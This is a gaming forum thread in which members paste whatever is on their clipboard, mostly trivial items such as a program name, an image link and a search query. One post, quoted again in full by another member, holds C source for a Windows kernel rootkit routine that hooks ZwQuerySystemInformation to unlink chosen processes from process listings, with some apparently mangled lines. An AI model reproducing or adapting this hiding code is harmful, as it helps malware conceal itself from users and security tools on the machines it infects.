• IMPORTANT: Welcome to the re-opening of GameRebels! We are excited to be back and hope everyone has had a great time away. Everyone is welcome!

Post What's On Your Clipboard!

W

Wiz Khalifa

Well-Known Member
Joined
Oct 13, 2012
Messages
222
Reaction score
0
WITHOUT changing it, press CTRL+V in the quick reply box and post what you currently have on your clipboard. You can explain what it is if you want.

Here's mine:

PC Decrapifier

~ I was googling a download link for that.
 
A

Azareal

Well-Known Member
Joined
Oct 9, 2012
Messages
30
Reaction score
0
http://www.digibarn.com/collections/systems/northstar-advantage/advantage2.jpg
Looking for an image to use in a thread.
 
Toxique

Toxique

Well-Known Member
MOTM
Joined
Jan 27, 2012
Messages
3,910
Reaction score
11
what time was the world suppose to end?


My stupid google search :p
 
Z

Zahreah

Well-Known Member
Joined
Mar 31, 2012
Messages
2,822
Reaction score
8
Ok,
#include <ntddk.h>
#include "process.h"

typedef unsigned char BYTE, *PBYTE;

WCHAR *ProcessToHide[128];
ULONG NbProcessToHide=0;

ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformationAddress = NULL;

LONGLONG UserTime=0, KernelTime=0;

NTSTATUS ZwQuerySystemInformationHook(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{

NTSTATUS status;
PSYSTEM_PROCESS_INFORMATION curr;
PSYSTEM_PROCESS_INFORMATION prev;
ULONG i;

status = ((ZWQUERYSYSTEMINFORMATION)(ZwQuerySystemInformati onAddress)) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength );

if( !NT_SUCCESS(status) )
return status;

if(SystemInformationClass!=5) // not a process request
return status;

for(i=0; i<NbProcessToHide; i++) {

curr = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
prev = NULL;

while(curr) {
//DbgPrint("Current item is %x\n", curr);
if (curr->ProcessName.Buffer != NULL) {

if( curr->ProcessName.Length == wcslen(ProcessToHide)*2 &&
!memcmp(curr->ProcessName.Buffer,ProcessToHide, curr->ProcessName.Length))
{

if(!prev) {
// we are first process
if(curr->NextEntryDelta) // if there is a process after it
// first process becomes this one
(PBYTE)SystemInformation += curr->NextEntryDelta;
else
// no process ! >_>
SystemInformation = NULL;
}
else {
// there was a process before
if(curr->NextEntryDelta) // if there is a process after
// previous process leads to next
prev->NextEntryDelta += curr->NextEntryDelta;
else
// previous process is the last one =)
prev->NextEntryDelta = 0;
}
}
else
// not a process to hide, prev ptr go to this process
prev = curr;
}

// curr go to next process
if(curr->NextEntryDelta)
((PBYTE)curr += curr->NextEntryDelta);
else
curr = NULL;
}
}

return status;
}
 
Toxique

Toxique

Well-Known Member
MOTM
Joined
Jan 27, 2012
Messages
3,910
Reaction score
11
Voi said:
Ok,
#include <ntddk.h>
#include "process.h"

typedef unsigned char BYTE, *PBYTE;

WCHAR *ProcessToHide[128];
ULONG NbProcessToHide=0;

ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformationAddress = NULL;

LONGLONG UserTime=0, KernelTime=0;

NTSTATUS ZwQuerySystemInformationHook(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{

NTSTATUS status;
PSYSTEM_PROCESS_INFORMATION curr;
PSYSTEM_PROCESS_INFORMATION prev;
ULONG i;

status = ((ZWQUERYSYSTEMINFORMATION)(ZwQuerySystemInformati onAddress)) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength );

if( !NT_SUCCESS(status) )
return status;

if(SystemInformationClass!=5) // not a process request
return status;

for(i=0; i<NbProcessToHide; i++) {

curr = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
prev = NULL;

while(curr) {
//DbgPrint("Current item is %x\n", curr);
if (curr->ProcessName.Buffer != NULL) {

if( curr->ProcessName.Length == wcslen(ProcessToHide)*2 &&
!memcmp(curr->ProcessName.Buffer,ProcessToHide, curr->ProcessName.Length))
{

if(!prev) {
// we are first process
if(curr->NextEntryDelta) // if there is a process after it
// first process becomes this one
(PBYTE)SystemInformation += curr->NextEntryDelta;
else
// no process ! >_>
SystemInformation = NULL;
}
else {
// there was a process before
if(curr->NextEntryDelta) // if there is a process after
// previous process leads to next
prev->NextEntryDelta += curr->NextEntryDelta;
else
// previous process is the last one =)
prev->NextEntryDelta = 0;
}
}
else
// not a process to hide, prev ptr go to this process
prev = curr;
}

// curr go to next process
if(curr->NextEntryDelta)
((PBYTE)curr += curr->NextEntryDelta);
else
curr = NULL;
}
}

return status;
}
Click to expand...


What were you doing?
 
You must log in or register to reply here.
Top